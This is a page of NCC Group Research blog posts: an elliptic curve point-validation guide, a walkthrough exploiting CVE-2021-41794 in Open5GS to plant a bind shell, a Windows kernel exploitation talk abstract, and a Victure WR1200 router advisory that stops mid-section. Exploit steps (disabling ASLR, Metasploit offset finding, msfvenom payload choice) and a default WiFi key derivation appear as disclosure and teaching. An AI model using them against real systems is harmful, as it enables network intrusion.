🔒
There are new articles available, click to refresh the page.
✇ NCC Group Research

An Illustrated Guide to Elliptic Curve Cryptography Validation

By: Paul Bottinelli

Elliptic Curve Cryptography (ECC) has become the de facto standard for protecting modern communications. ECC is widely used to perform asymmetric cryptography operations, such as to establish shared secrets or for digital signatures. However, insufficient validation of public keys and parameters is still a frequent cause of confusion, leading to serious vulnerabilities, such as leakage of secret keys, signature malleability or interoperability issues.

The purpose of this blog post is to provide an illustrated description of the typical failures related to elliptic curve validation and how to avoid them in a clear and accessible way. Even though a number of standards1,2 mandate these checks, implementations frequently fail to perform them.

While this blog post describes some of the necessary concepts behind elliptic curve arithmetic and cryptographic protocols, it does not cover elliptic curve cryptography in detail, which has already been done extensively. The following blog posts are good resources on the topic: A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography by Nick Sullivan and Elliptic Curve Cryptography: a gentle introduction by Andrea Corbellini.

In elliptic curve cryptography, public keys are frequently sent between parties, for example to establish shared secrets using Elliptic curve Diffie–Hellman (ECDH). The goal of public key validation is to ensure that keys are legitimate (by providing assurance that there is an existing, associated private key) and to circumvent attacks leading to the leakage of some information about the private key of a legitimate user.

Issues related to public key validation seem to routinely occur in two general areas. First, transmitting public keys using digital communication requires to convert them to bytes. However, converting these bytes back to an elliptic curve point is a common source of issues, notably due to canonicalization. Second, once public keys have been decoded, some mathematical subtleties of the elliptic curve operations may also lead to different types of attacks. We will discuss these subtleties in the remainder of this blog post.

TL;DR

In general3, vulnerabilities may arise when applications fail to check that:

  1. The point coordinates are lower than the field modulus.
  2. The coordinates correspond to a valid curve point.
  3. The point is not the point at infinity.
  4. The point is in the correct subgroup.

An Illustrated Guide to Validating ECC Curve Points

Elliptic curves are curves given by an equation of the form y^2 = x^3 + ax + b (called short Weierstrass form). Elliptic curve cryptography deals with the group of points on that elliptic curve, namely, a set of (x, y) values satisfying the curve equation.

These values, called coordinates (more specifically, affine coordinates), are defined over a field. For use in Cryptography, we work with coordinates defined over a finite field. For the purpose of this blog post, we will concentrate our efforts on the field of integers modulo p, with p a prime number (and p > 3), which we call the field modulus. Elements of this field can take any value between 0 and p - 1 . In the following figure, the white squares depict valid field elements while grey squares represent the elements that are larger than the field modulus.

Mathematically, a value larger than the field modulus is equivalent to its reduced form (that is, in the 0 to p-1 range, see congruence classes), but in practice these ambiguities may lead to complex issues4.

    In ECC, a public key is simply a point on the curve. Since curve points are generally first encoded to byte arrays before being transmitted, the first step when receiving an encoded curve point is to decode it. This is what we identified earlier as the first area of confusion and potential source of vulnerabilities. Specifically, what happens when the integer representation of the coordinates we decoded are larger than the field modulus?

This is the first common source of issues and the reason for our first validation rules:

Check that the point coordinates are lower than the field modulus.

What can go wrong? If the recipient does not enforce that coordinates are lower than the field modulus, some elliptic curve point operations may be incorrectly computed. Additionally, different implementations may have diverging interpretations of the validity of a point, possibly leading to interoperability issues, which can be a critical issue in consensus-driven deployments.

In the figure below, this means that the point coordinates should be rejected if they are not in the white area in the bi-dimensional plane.

    Since both coordinates are elements of this finite field, it might seem that an elliptic curve point could theoretically take any value in the white area above. However, not all pairs of (x, y) values in this plane are valid curve points; remember that they need to satisfy the curve equation y^2 = x^3 + ax + b in order to be on the curve. We represent the valid curve point in blue in the figure below5. The number of points on the curve is referred to as the curve order.

This is another common source of issues and where our second validation rule arises:

Check that the point coordinates correspond to a valid curve point (i.e. that the coordinates satisfy the curve equation).

What can go wrong? If the recipient of a public key fails to verify that the point is on the curve, an attacker may be able to perform a so-called invalid curve attack6. Some point operations being independent of the value of b in the elliptic curve equation, a malicious peer may carefully select a different curve (by varying the value of b) in which the security is reduced (namely, the discrete logarithm problem is easier than on the original curve). By then sending a point on that new curve (and provided the legitimate peer fails to verify that the point coordinates satisfy the curve equation), the attacker may eventually recover the legitimate peer’s secret.

    In practice, curve points are rarely sent as pairs of coordinates, which we call uncompressed. Indeed, the y-coordinate can be recovered by solving the curve equation for a given x, which is why point compression was developed. Point compression reduces the amount of data to be transmitted by (almost) half, at the cost of a few more operations necessary to solve the curve equation. However, solving the equation for a given x may have different outcomes. It can either result in:

  • no solutions (in case y^2 does not have a square root in the field, i.e. is not a quadratic residue), in which case the point should be rejected; or
  • two solutions, (x, y) and (x, -y), due to the fact that y^2 = (-y)^2. However, all coordinates must lie in the 0 \ldots p-1 range, which are all positive numbers. Since we’re working in the field of integers modulo p, that negative y-coordinate is actually equivalent to the field element p - y, which lies in the correct range.

Hence, when compressing a point, an additional byte of data is used to distinguish the correct y-coordinate. Specifically, point encoding (following Section 2.3.3 of SEC 1, works by prepending a byte to the coordinate(s) specifying which encoding rule is used, as follows:

  • Compressed point: 0x02 || x if y is even and 0x03 || x if y is odd;
  • Uncompressed point: 0x04 || x || y.7

Any other value for the first byte should result in the curve point being ignored. Point compression has a significant benefit in that it ensures that the point is on the curve, since in case there is no solution, implementation should reject the point.

    Now, the careful reader may have realized that the set of points in the figure above is incomplete. In order for this set to form a group (in the mathematical sense), and be useful in cryptography, it needs to be supplemented with an additional element, the point at infinity. This point, also called neutral element or additive identity, is the element \mathcal{O} such that for any point P on our elliptic curve, P + \mathcal{O} = \mathcal{O} + P = P. The figure below shows the previous set of points on our arbitrary curve with the addition of the point at infinity, which we (artificially) positioned slightly outside our plane, in the bottom left corner.

Since the point at infinity is not on the curve, it does not have well-defined x and y coordinates like other curve points. As such, its representation had to be constructed artificially8. Standards (such as SEC 1: Elliptic Curve Cryptography) define the encoding of the point at infinity to be a single octet of value zero. Confusingly, implementations sometimes also use other encodings for the point at infinity, such as a number of zero bytes equal to the size of the coordinates.

Implementations sometimes fail to properly distinguish the point at infinity, and this is where our third validation rule comes from:

Check that the point is not the point at infinity.

What can go wrong? Since multiplying the point at infinity by any scalar results in the point at infinity, an adversary may force the result of a key agreement to be zero if the legitimate recipient fails to check that the point received is not the point at infinity. This goes against the principle of contributory behavior, where some protocols require that both parties contribute to the outcome of an operation such as a key exchange. Failure to enforce this check may have additional negative consequences in other protocols.

    Recall that the curve order, say N, corresponds to the number of points on the curve. To make matters more complicated, the group of points on an elliptic curve may be further divided into multiple subgroups. Lagrange’s theorem tells us that any subgroup of the group of points on the elliptic curve has an order dividing the order of the original group. Namely, the size (i.e. the number of points) of every subgroup divides the total number of points on the curve.

In cryptography, to ensure that the discrete logarithm problem is hard, curves are selected in such a way that they consist of one subgroup with large, prime order, say n, in which all computations are performed. Some curves (such as the NIST curves9, or the curve secp256k110 used in bitcoin) were carefully designed such that n = N, namely the prime order group in which we perform operations is the full group of points on the elliptic curve. In contrast, the popular Curve25519 has curve order N = 8n, which means that points on this curve can belong to the large prime-order subgroup of size n, or to a subgroup with a much smaller order, of size 2, 4 or 8, for example11. The value h such that h = N/n is called the cofactor, it can be thought of as the ratio between the total number of points on the curve and the size of the prime-order subgroup in which cryptographic operations are performed.

To illustrate this notion, consider the figure below in which we have further subdivided our fictitious set of elliptic curve points into two groups. When performing operations on elliptic curve points, we want to stick with operations on points in the larger, prime-order subgroup, identified by the blue points below.

And this is where our last validation rule comes from:

Check that the point is in the correct subgroup.

This can be achieved by checking that nP = \mathcal{O}. Indeed, a consequence of Lagrange’s theorem is that any group element multiplied by the order of that group is equal to the neutral element. If P were in the small subgroup, multiplying it by n would not equal \mathcal{O}. This highlights another possible method for checking that the point belongs to the correct subgroup; one could also check that hP \neq \mathcal{O}. Contrary to the previous validation rules, this check is considerably more expensive since it requires a point multiplication, and as such is sometimes (detrimentally) skipped for efficiency purposes.

What can go wrong? A malicious party sending a point in the orange subgroup, for example as part of an ECDH key agreement protocol, would result in the honest party performing operations limited to that small subgroup. Thus, if the recipient of a public key failed to check that the point was in the correct subgroup, the attacker could perform a so-called small subgroup attack (also known as subgroup confinement attacks) and learn information about the legitimate party’s private key12.

Does that apply to all curves?

While the presentation above is fairly generic and applies in a general sense to all curves, some curves and associated constructions were created to prevent some of these issues by design.

NIST curves (e.g. P-256) and the Bitcoin curve (secp256k1)

These curves have a cofactor value of 1 (namely, h = 1). As such, there is only one large subgroup of prime order and all curve points belong to that group. Hence, once the first 3 steps in our validation procedure have been performed, the last step is superfluous.

Curve25519

Curve25519, proposed by Daniel J. Bernstein and specified in RFC 7748, is a popular curve which is notably used in TLS 1.3 for key agreement.

Although Curve25519 has a cofactor of 8, some functions using this curve were designed to prevent cofactor-related issues. For example, the X25519 function used to perform key agreement using Curve25519 mandates specific checks and performs key agreement using only x-coordinates, such that invalid curve attacks are avoided. Additionally, the governing RFC states in Section 5 that

Implementations MUST accept non-canonical values and process them as if they had been reduced modulo the field prime. The non-canonical values are 2^255 – 19 through 2^255 – 1 for X25519.

This seems to address most issues discussed in this post. However, there has been some debate13 over the claimed optional nature of these checks.

With the popularity of Curve25519 and the desire for cryptographers to design more exotic protocols with it, the cofactor value of 8 resurfaced as a potential source of problems. Ristretto was designed as a solution to the cofactor pitfalls. Ristretto is an abstraction layer, on top of Curve25519, which essentially restricts curve points to a prime-order subgroup.

Double-Odd Elliptic Curves

Finally, a strong contender in the secure-by-design curve category is the Double-Odd family of elliptic curves, recently proposed by Thomas Pornin. These curves specify a strict and economical encoding, preventing issues with canonicalization and, even though their cofactor is not trivial, a prime order group is defined on them, similar in spirit to Ristretto’s approach, preventing subgroup confinement attacks.

Conclusion

With the ubiquitous use of elliptic curve cryptography, failure to validate elliptic curve points can be a critical issue which is sadly still commonly uncovered during cryptography reviews. While standards and academic publications provide ample directions to correctly validate curve points, implementations still frequently fail to follow these steps. For example, a vulnerability nicknamed Curveball was reported in January 2020, which allowed attacker to perform spoofing attacks in Microsoft Windows by crafting public points. Recently, we also uncovered a critical vulnerability in a number of open-source ECDSA libraries, in which the verification function failed to check that the signature was non-zero, allowing attackers to forge signatures on arbitrary messages, see the technical advisory Arbitrary Signature Forgery in Stark Bank ECDSA Libraries.

This illustrated guide will hopefully serve as an accessible reference on why and how point validation should be performed.

Thank you

The author would like to thank Eric Schorn and Giacomo Pope for their detailed review and helpful feedback.


References

  1. Standards for efficient cryptography, SEC 1: Elliptic Curve Cryptography, Section 3.2.2.1 Elliptic Curve Public Key Validation Primitive.
  2. NIST Special Publication 800-56A, Section 5.6.2.3.2 FFC Partial Public-Key Validation Routine and 5.6.2.3.3 ECC Full Public-Key Validation Routine.
  3. That is, unless using an elliptic curve that was designed specifically to address these potential issues, we will come back to that at the end of this blog post.
  4. Specifically, implementations may handle values that are larger than the field modulus in different ways. They may reject non-reduced values (i.e., non-canonical encodings), accept non-reduced values and reduce them modulo the prime order, or accept non-reduced values and discard the most significant bit(s). An interesting example happened with the cryptocurrency Zcash, where different implementations had distinct interpretations regarding the validity of curve points. Some details can be found in a blog post by Henry de Valence, as well as in a public report following a cryptography review performed by NCC Group.
  5. Note that this figure does not represent an actual elliptic curve; it is just an arbitrary diagram designed for illustrative purposes.
  6. Ingrid Biehl, Bernd Meyer and Volker Müller. “Differential Fault Attacks on Elliptic Curve Cryptosystems”. In: Advances in Cryptology – CRYPTO 2000, 20th Annual International Cryptology Conference, Santa Barbara, California, USA, August 20-24, 2000, Proceedings. 2000, pp. 131–146.
  7. Note that there is a hybrid form starting in 0x06 defined in ANSI X9.62, but this format is very rarely used in practice.
  8. Note that some curves and alternate point representations (for instance, when working in projective coordinates) may allow the point at infinity to have a well-defined representation.
  9. Standardized in FIPS PUB 186-4: Digital Signature Standard (DSS).
  10. Standardized in SEC 2: Recommended Elliptic Curve Domain Parameters.
  11. The paper Taming the many EdDSAs provides some very interesting discussions around ambiguities in the Ed25519 signature verification equations (which is based on Curve25519). These ambiguities led to different interpretations of the validity of signatures, which resulted in implementations returning different validity results for some signatures, which could be critical in consensus-driven applications.
  12. Chae Hoon Lim and Pil Joong Lee. “A Key Recovery Attack on Discrete Log-based Schemes Using a Prime Order Subgroup”. In: Advances in Cryptology – CRYPTO ’97, 17th Annual International Cryptology Conference, Santa Barbara, California, USA, August 17-21, 1997, Proceedings. 1997, pp. 249–263.
  13. See https://moderncrypto.org/mail-archive/curves/2017/000896.html.

✇ NCC Group Research

Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks

By: nccmarktedman

Following on from our previous blog post ‘The Challenges of Fuzzing 5G Protocols’, in this post, we demonstrate how an attacker could use the results from the fuzz testing to produce an exploit and potentially gain access to a 5G core network.

In this blog post we will be using the PFCP bug (CVE-2021-41794) we’d previously found using Fuzzowski 5GC in Open5GS[1] (present from versions 1.0.0 through 2.3.3), to demonstrate the potential security risk a buffer overflow can cause.

We will cover how to examine the bug for possible exploit, how to create the actual exploit code, and how it is integrated into a PFCP message.  Finally, we will discuss mitigations that can help reduce/eliminate this type of attack.

In this blog we have taken steps to simplify the process in an effort to make it available to a wider audience.  We have used a proof of concept to explain the techniques and turned off some of the standard mitigations to reduce the complexity of the exploit.

Background

Previously we used Fuzzowski 5GC to fuzz the UPF component of the Open5GS project (version 2.2.9).  The fuzz testing found a buffer overflow bug in the function ‘ogs_fqdn_parse‘.  This type of bug is reasonably easy to exploit, and the basic idea is shown below.

We will use this bug to show how a malicious payload can be written to the variable ‘dnn’, the variable overflowed to set the return address, and execution gained to take control of the UPF process.

Test Environment

To make the exploit development easier and to keep the technical details as simple as possible, a few security mitigations were disabled:

  • ASLR – Address Space Layout Randomization
  • Stack protection
  • Stack non-exec (NX)

Many systems run with insufficient mitigations, so testing exploitation in this context makes sense for showing how exploitation might be possible against one of these platforms. Furthermore, most of these mitigations can be bypassed given the right bug conditions. Although we didn’t investigate bypassing these mitigations for this research, it may be possible that certain manifestations of the bug allow for exploitation on a more hardened platform.

The following environments and tools were used to test and develop the exploit:

  • Open5GS version 2.2.9 – The target
  • Ubuntu 20.04 VM – Host for Open5GS
  • Kali Linux 2021.1 VM – Tools for exploit development
  • MsfVenom – Metasploit standalone payload generator
  • Msf-pattern_create – Unique string pattern generator
  • Msf-pattern_offset – Finds substring in string generated by msf-pattern_create
  • GDB Debugger – For examining the execution
  • Visual Code – Source code editor
  • Netcat – To test the exploit

In the past low-level knowledge of assembler was often required to write the exploit, but with the advent of tools such as MsfVenom, generating exploit code is now ridiculously easy. However, there are still instances where custom shell code is required to develop a working exploit, for example if space is limited.

Where to Start?

First, we need to find exactly where the buffer overflow occurs and why.  This stage has already been covered so please refer to the previous blog post ‘The Challenges of Fuzzing 5G Protocols’ for more details.

For a quick recap we have a buffer created on the stack called ‘dnn’ which is defined as 100 bytes long.

This buffer is passed into the function ‘ogs_fqdn_parse’ as a pointer along with the source data buffer (message->pdi.network_instance.data) containing the value of ‘internet’ which is 8 bytes long (message->pdi.network_instance.len).

When the ‘ogs_fqdn_parse’ function executes, the memcpy copies data from the source to the destination overflowing the destination buffer by 5 bytes in this example.  By reviewing the source code, we can see that we have control over the contents of the ‘src’ parameter and the ‘length’ parameter.  Also note that we have read beyond the end of the ‘src’ buffer which could be used to leak information, but that’s a different type of bug that we won’t explore here.

On examining the function ‘ogs_fqdn_parse’, it’s possible to see that we can write as much data as we like into the destination buffer.  The only issue we face when trying to insert assembly code is the insertion of ‘.’ character or the null termination byte after the memcpy at line 302 and 304 above.

So, although we can write as much data as we want, we are limited to how much code can be inserted if we want to keep this example as simple as possible.  As the variable ‘len’ is an unsigned byte the maximum number of bytes for assembly code is limited to 255 bytes.  We could of course write some custom assembly code to jump over the ‘.’ characters but this adds extra complication.

Before rushing off to code our exploit, it is always worth looking at the other places this function is used as there may be a better opportunity to exploit the bug.  So lets search the source code for other calls to ‘ogs_fqdn_parse’.

As we can see this function is used by several other components in the 5G core which could also be potential targets.  This opens up the attack vectors as we now have potentially multiple 5G core components that can be exploited in a similar fashion.  While the fuzzer only found a single bug in one component (in this case the UPF), examining the code shows that other components such as the AMF, MME, SMF, SGWC may be susceptible to the same issue.  This also highlights that fuzz testing alone will not necessarily find all vulnerabilities, in this example we fuzzed the AMF, MME and failed to discover the same bug.

It is worth pointing out that some of these other calls are not exploitable due to size checks before the call to ‘ogs_fqdn_parse’.  For example, in the following code, the function ‘ogs_nas_5gs_decode_dnn’ the size of the input data is checked against the size of the data structure ‘ogs_nas_dnn_t’ on line 122 below.  This prevents the function ‘ogs_fqdn_parse’ from being called if the input data is larger than the destination structure, which prevents the stack from being corrupted.

For our example exploit we will continue to use the original location of the buffer overflow discovered by our fuzzer.  The function ‘ogs_pfcp_handle_create_pdr’ which is called when the UPF processes a PFCP Session Establishment Request message.

Proof of Concept

To demonstrate the exploit, it is easier to create a simple test program before attempting to exploit the actual component where the stack may be more complicated.

The code below shows a simple test program structured similar to how the function is called in the actual UPF application.  Initially we want to determine the offset on the stack of the function return address for the function ‘test’ in our example.

This simple test program creates a variable ‘dnn’ on the stack along with a unique string of characters for the ‘name’ variable.  The function ‘ogs_fqdn_parse’ is then called to cause the stack corruption and overwrite the return address of the ‘test’ function.  This should cause the test program to crash as the value written to the return address is unlikely to be a valid memory address.

Generating the data for the name variable is done by using the Metasploit Framework tool ‘pattern_create.rb’.  This generates a unique sequence of characters that can later be used to find the relevant offset for the return address.

Command to generate unique string of characters:
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

The function ‘ogs_fqdn_parse’ is expecting the data to start with a single byte indicating the length of the data to follow.  To copy the 1000 bytes of data that has been generated onto the stack, we need to split it up and specify the relevant sizes in bytes.

Before we can run the program, we need to switch off ASLR (Address Space Layout Randomization).

$ sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space"

Then enable unlimited file size for core files.

$ ulimit -c unlimited

If we compile the test application and run it, we get the following output:

$ cc -g test_stack.c -o test_stack

$ ./test_stack 
dnn address: 0x7fffffffdfb0
zsh: segmentation fault (core dumped)  ./test_stack

As expected, the program crashed because we wrote 1000 bytes of data over important stack variables required for normal program execution.  The observant amongst you will have realized that we actually wrote 1010 bytes to the stack, but we will come back to that later.

So now we have run the test program and it has generated a core file, it’s now time to examine the crash and find the offset to the magic return address.  We will now examine the core file using the debugger gdb.

Using the following command let’s load the core file with gdb so we can examine it:

$ gdb ./test_stack --core=core

The following image shows the stack layout before the memcpy is executed.  Looking at the layout we should only need to write approximately 116 bytes to overwrite the return address, so writing 1000 bytes is a bit of an over kill for the proof of concept.  However, the stack in the UPF may have more variables between the variable ‘dnn’ and the return address which may require us to write a reasonable amount of data to the stack before we reach the location of the return address we are trying to change.

All we need to do now is use another Metasploit Framework tool called ‘pattern_offset.rb’ to calculate the offset of the return address.  To do this we take the address stored in the saved RIP register associated with the function ‘test’ stack frame (i.e. 0x4131654130654139), and use it as the query parameter for ‘pattern_offset.rb’.

$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x4131654130654139
[*] Exact match at offset 119

An exact match is found at offset 119.  We need to be careful here as this is not the actual offset of the return address.  119 is the offset of part of our string from the beginning of our unique string.  As mentioned earlier we actually wrote 1010 bytes to the stack, which we now need to consider when calculating the final offset of the return address.

We can check this by displaying the first 128 bytes of the stack variable ‘dnn’ in our example program.

Using the following command in the debugger to show the contents of ‘dnn’
(gdb) x/128bb dnn 

Note there is a gap between the end of the ‘dnn’ variable and the frame pointer which is due to 16-byte alignment requirements.

Creating the Exploit

This is where in the good old days you would crack open the ‘64-IA-32 Architectures Software Developer Instruction Set Reference Manual[2]’ and start hand crafting some assembly code.  Fortunately, these days the Metasploit Framework has made this task very simple indeed.

The Metasploit Framework tool ‘MsfVenom’ can generate a number of different payloads/exploits by simply providing a few command line options.

We have chosen the payload ‘linux/x64/shell_bind_tcp’ which generates code to start a shell prompt when a connection is made to the specified port 5600.  The option to append code to exit the program has also been included.  The ‘-f’ option is used to generate C code.

As we can see from the output of ‘MsfVenom’, the payload is conveniently only 94 bytes long.  This means that we can copy it directly to the stack without worrying about the ‘.’ or null character messing up our assembly code. If the payload was longer than 255 bytes (the maximum size of a chunk we can copy) we would need to write some custom assembly code to skip over the ‘.’ character that is inserted after each chunk of data is copied.

If we now replace the unique ASCII string in our test program with the output from ‘MsfVenom’ and the return address, we should have a working exploit!

Exploiting the UPF Component

Now we have a working proof of concept we know our exploit works.  All we need to do now is repeat the process of finding the return address when returning from the function ‘ogs_pfcp_handle_create_pdr’, calculate the offset of the ‘dnn’ buffer and finally create a suitable PFCP Session Establish Request message to send the exploit to the UPF.

Sounds straightforward enough, however the reality is a little more complicated.  To start with the function ‘ogs_pfcp_handle_create_pdr’ is a bit more complicated than our simple ‘test’ function.  From the point where we overflow the stack variable ‘dnn’, we need execution to continue until the end of the function ‘ogs_pfcp_handle_create_pdr’ for our exploit code to be executed.  As there are several other function calls and variable assignments, we need these to complete without crashing the UPF.

The main problem we have is the variable ‘pdr’ which is a pointer on the stack.  This will be overwritten when we overwrite the return address because it is at a higher address on the stack compared to the ‘dnn’ variable.

To fix this we need to find the offset of the variable ‘pdr’ and assign it to something sensible when we overflow the variable ‘dnn’.  We can use the Metasploit tools ‘pattern_create.rb’ and ‘pattern_offset.rb’ again to determine this offset.  Once the variable ‘pdr’ has been fixed up, the function then executes to completion and returns, executing our exploit code.

The value of ‘pdr’ is at a fixed offset in our example as we have disabled ASLR.  This means that we can hard code the value in our exploit once we have calculated it.

To create the PFCP Session Establish Request message we used Fuzzowski 5GC and set the Network Instance Information Element to contain our exploit code.

We then tested the exploit by using Fuzzowski 5GC to send the PFCP messages to the UPF.

After successful testing of the exploit, we used the POC (Proof of Concept) feature of Fuzzowski 5GC to generate a standalone python exploit script.  This saves a lot of time compared to hand crafting the messages and having to calculate nested length fields and checksums etc.  Below is a section of the PFCP Session Establish Request message containing our exploit, the ‘pdr’ pointer fix and the return address.

Mitigations

To simplify this blog post and hopefully make it understandable to a wider audience, the standard mitigations that help prevent these kinds of bugs being exploited have been disabled.  This enabled a much simpler exploit process to be followed, allowing us to demonstrate the potential damage that can be done by exploiting buffer overflows.

The following mitigations would make the demonstrated exploit much harder, but not necessarily impossible to exploit.

  • ASLR – Address Space Layout Randomization
  • Stack protection
  • Stack execution prevention

ASLR – Address Space Layout Randomization

Randomizing the loading address of various parts of an application make it difficult for an attacker to locate parts of the application they want to target.  For example, most operating systems implement some form of ASLR which changes the address of things such as the stack, heap, and library modules.  Generally, applications need to be compiled with support for ASLR.

Stack Protection

By enabling stack protection options during compilation of an application, extra code can be inserted before and after each function in an attempt to detect stack corruption within a function.  This may prevent further exploitation to some degree, but it will cause the application to exit which is not necessarily desirable.

Stack Execution Prevention

By preventing the area of memory that contains the stack from being executable, the type of exploit demonstrated would not be possible.  There are however other techniques that can be used to circumvent this protection.

Other Mitigations

There are several other mitigations that could help prevent this type of bug in the first place.  For example:

  • Better functional/system testing
  • Better coding standards/practices
  • Use of more secure versions of functions to replace functions like memcpy
  • Code reviews
  • Use of static analysis tools
  • Fuzz Testing
  • Design with security in mind

The Bug Fix

In version 2.3.4 of Open5GS a fix was implemented for our original reported bug (CVE-2021-41794).  While this patch fixed the reported bug there are still issues with the function ‘ogs_fqdn_parse’.

As the src‘ buffer is effectively controlled by the attacker the above issues are possible depending upon how the function ‘ogs_fqdn_parse‘ is called.  If size checks have been done before calling the function, then it’s not so much of an issue, however it is asking for trouble to have the user of the function validating what’s passed in to prevent the buffer overflow.

The current patch in version 2.3.4 is susceptible to the second issue of writing a null byte beyond the end of the destination buffer.

This just highlights the importance of using all possible mitigations to avoid releasing vulnerable code in the first place.

The original PFCP bug (CVE-2021-41794) was concerned with the calculation of the ‘len‘ variable at line 328 above, and its use in the memcpy at line 334 without being validated. The expectation was for the function ‘ogs_fqdn_parse‘ to be completely rewritten instead of an ‘if‘ statement being added to only fix the original bug.

Although reading beyond the length of the ‘src‘ variable requires a coding error in the calling function, the one byte buffer overflow can be caused by data passed in by an attacker.

  • 01/11/2021 – Notified Open5GS of issues (read beyond ‘src‘ variable and one byte overflow to ‘dst‘ variable)
  • 06/11/2021 – Requested example packet to cause one byte overflow
  • 09/11/2021 – Sent example python script and screenshot to demonstrate one byte overflow
  • 15/11/2021 – Open5GS main branch patched

This will be fixed in Open5GS versions released after 2.3.6. However the solution of extending the buffers by one byte is not an ideal fix.

We hope this blog post has given you a high level technical insight into the dangers of a simple buffer overflow bug, and how it can potentially be exploited by an attacker!

Glossary

Term Description
ASLR Address Space Layout Randomization
UPF User Plane Function
Fuzzer Software that generates invalid input for testing applications
Stack Area of memory used to store function call data
MME Mobility Management Entity

References

[1] GitHub – open5gs/open5gs: Open5GS is an Open Source implementation for 5G Core and EPC

[2] 64-IA-32 Architectures Software Developer Instruction Set Reference Manual

How to work with us on Commercial Telecommunications Security Testing

NCC Group has performed cybersecurity audits of telecommunications equipment for both small and large enterprises. We have experts in the telecommunications field and work with world-wide operators and vendors on securing their networks. NCC Group regularly undertake assessments of 3G/4G/5G networks as well as providing detailed threat assessments for clients. We have the consultant base who can look at the security threats in detail of your extended enterprise equipment, a mobile messaging platform or perhaps looking in detail at a vendor’s hardware. We work closely with all vendors and have extensive knowledge of each of the major vendor’s equipment.

NCC Group is at the forefront of 5G security working with network equipment manufacturers and operators alike. We have the skills and capability to secure your mobile network and provide unique insights into vulnerabilities and exploit vectors used by various attackers. Most recently, we placed first in the 5G Cyber Security Hack 2021 Ericsson challenge in Finland.

NCC Group can offer proactive advice, security assurance, incident response services and consultancy services to help meet your security needs.

If you are an existing customer, please contact your account manager, otherwise please get in touch with our sales team.

✇ NCC Group Research

POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides

By: Alex Plaskett

Alex Plaskett presented “Pwning the Windows 10 Kernel with NTFS and WNF” at Power Of Community (POC) on the 11th of November 2021.

The abstract of the talk is as follows:

A local privilege escalation vulnerability (CVE-2021-31956) 0day was identified as being exploited in the wild by Kaspersky. At the time it affected a broad range of Windows versions (right up to the latest and greatest of Windows 10).
With no access to the exploit or details of how it worked other than a vulnerability summary the following plan was enacted:

  1. Understand how exploitable the issue was in the presence of features such as the Windows 10 Kernel Heap-Backed Pool (Segment Heap).
  2. Determine how the Windows Notification Framework (WNF) could be used to enable novel exploit primitives.
  3. Understand the challenges an attacker faces with modern kernel pool exploitation and what factors are in play to reduce reliability and hinder exploitation.
  4. Gain insight from this exploit which could be used to enable detection and response by defenders.

The talk covers the above key areas and provides a detailed walk through, moving from introducing the subject, all the way up to the knowledge which is needed for both offense and defence on modern Windows versions.

The slides for the talk can be downloaded as follows:

✇ NCC Group Research

Technical Advisory – Multiple Vulnerabilities in Victure WR1200 WiFi Router (CVE-2021-43282, CVE-2021-43283, CVE-2021-43284)

By: Nicolas Bidron

Victure’s WR1200 WiFi router, also sometimes referred to as AC1200, was found to have multiple vulnerabilities exposing its owners to potential intrusion in their local WiFi network and complete overtake of the device.

Three vulnerabilities were uncovered, with links to the associated technical advisories below:

CVE-2021-43283 is a common Remote Code Execution vulnerability which is frequently found in routers implementing a ping/trace feature through their web interface that relies on a call to the ping or trace command made to the underlying router OS.

However, here the more interesting vulnerabilities are the 2 others which can easily be chained together to go from opportunistic sniffing of WiFi networks to full compromise of the router:

  • CVE-2021-43282 allows an attacker to easily guess the default WiFi WPA2 key (if it was not manually changed by the device owner) which in this case would be the last 4 bytes from the MAC address of the router which is advertised by the access point, and can be retrieved by a basic WiFi scan.
  • CVE-2021-43284 allows any user on the local network to open an SSH connection on the rooter with the default root:admin credentials, and despite the user best efforts to change the default admin account password from the web interface, the password for the root account will not be changed at the same time.

While NCC Group was able to get in contact with Victure’s support team and communicate these findings to them, those bugs were left unfixed. After giving a reasonable amount of time to Victure to fix these findings according to NCC’s responsible disclosure policies, it was decided to publicly release the following advisories. The disclosure timeline can be found at the bottom of this page.

Technical Advisories:

Default WiFi Network Password Advertised by Victure WR1200 WiFi router MAC address (CVE-2021-43282)

Vendor: Victure
Vendor URL: https://www.govicture.com
Versions affected: All versions up to and including 1.0.3
Systems Affected: WR1200
Author: Nicolas Bidron
CVE Identifier: CVE-2021-43282
Severity: High 8.1 (CVSS v3.1 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

Summary

Victure’s WR1200 WiFi router is a general consumer WiFi router with an integrated web interface for configuration. It was found that the default password for the two WiFi networks is advertised to unauthenticated users within WiFi range.

Impact

The device default WiFi password for both 2.4GHz and 5GHz networks can be trivially guessed by an attacker within range of the WiFi network, allowing the attacker to gain complete access to these networks if the password has been left unchanged from it’s factory default.

Details

The device default WiFi password corresponds to the last 4 bytes of the MAC address of it’s 2.4GHz network interface controller (NIC). An attacker within scanning range of the WiFi network can thus scan for WiFi networks with the following command.

$ iwlist wlp1s0 scanning | egrep "Victure" -B 5
          Cell 03 - Address: 38:01:46:FD:1C:C5
                    Channel:11
                    Frequency:2.462 GHz (Channel 11)
                    Quality=68/70  Signal level=-42 dBm  
                    Encryption key:on
                    ESSID:"Victure-1CC5"
--
          Cell 05 - Address: 38:01:46:FD:1C:C7
                    Channel:157
                    Frequency:5.785 GHz
                    Quality=49/70  Signal level=-61 dBm  
                    Encryption key:on
                    ESSID:"Victure-1CC5-5G"

The attacker can then effectively guess the correct default password from the last 4 bytes of the MAC address 46:FD:1C:C5 -> password: 46fd1cc5

Recommendation

  • Change the WPA key for both 2.4GHz and 5GHz WiFi networks through the router’s web interface

OS Command Injection in Victure WR1200 WiFi router (CVE-2021-43283)

Vendor: Victure
Vendor URL: https://www.govicture.com
Versions affected: All versions up to and including 1.0.3
Systems Affected: WR1200
Author: Nicolas Bidron
CVE Identifier: CVE-2021-43283
Severity: High Medium 6.8 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

Summary

Victure’s WR1200 WiFi router is a general consumer WiFi router with an integrated web interface for configuration. It was found that an attacker can inject shell commands through one the forms on the web interface of the device.

Impact

A command injection vulnerability was found within the web interface of the device allowing an attacker with valid credentials to inject arbitrary shell commands to be executed by the device with root privileges. An attacker would thus be able to use this vulnerability to open a reverse shell on the device with root privileges.

Details

